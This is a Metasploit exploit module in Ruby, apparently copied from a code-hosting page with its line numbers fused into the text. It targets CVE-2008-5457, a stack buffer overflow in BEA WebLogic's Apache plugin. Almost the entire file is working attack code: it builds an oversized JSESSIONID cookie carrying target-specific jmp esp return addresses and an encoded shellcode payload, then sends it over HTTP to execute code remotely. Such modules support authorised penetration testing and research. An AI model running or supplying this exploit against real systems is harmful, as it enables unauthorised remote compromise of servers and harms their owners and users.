Path: blob/master/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow',16'Description' => %q{17This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable18code is only accessible when clustering is configured. A request containing a19long JSESSION cookie value can lead to arbitrary code execution.20},21'Author' => 'pusscat',22'References' => [23[ 'CVE', '2008-5457' ],24[ 'OSVDB', '51311' ],25],26'DefaultOptions' => {27'EXITFUNC' => 'seh',28},29'Privileged' => true,30'Platform' => 'win',31'Payload' => {32'Space' => 800,33'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",34'StackAdjustment' => -3500,35},36'Targets' => [37[38'Windows Apache 2.2 - WebLogic module version 1.0.1136334',39{40'Ret' => 0x1006c9b5, # jmp esp41}42],43[44'Windows Apache 2.2 - WebLogic module version 1.0.1150354',45{46'Ret' => 0x1006c9be, # jmp esp47}48],49],50'DefaultTarget' => 1,51'DisclosureDate' => '2009-01-13',52'Notes' => {53'Reliability' => UNKNOWN_RELIABILITY,54'Stability' => UNKNOWN_STABILITY,55'SideEffects' => UNKNOWN_SIDE_EFFECTS56}57)58)5960register_options(61[62Opt::RPORT(80)63]64)65end6667def exploit68sploit = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)69sploit[8181, 4] = [target.ret].pack('V')70sploit[8185, payload.encoded.length] = payload.encoded7172request =73"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" +74sploit +75"\r\n\r\n"7677connect78sock.put(request);79handler8081disconnect82end83end848586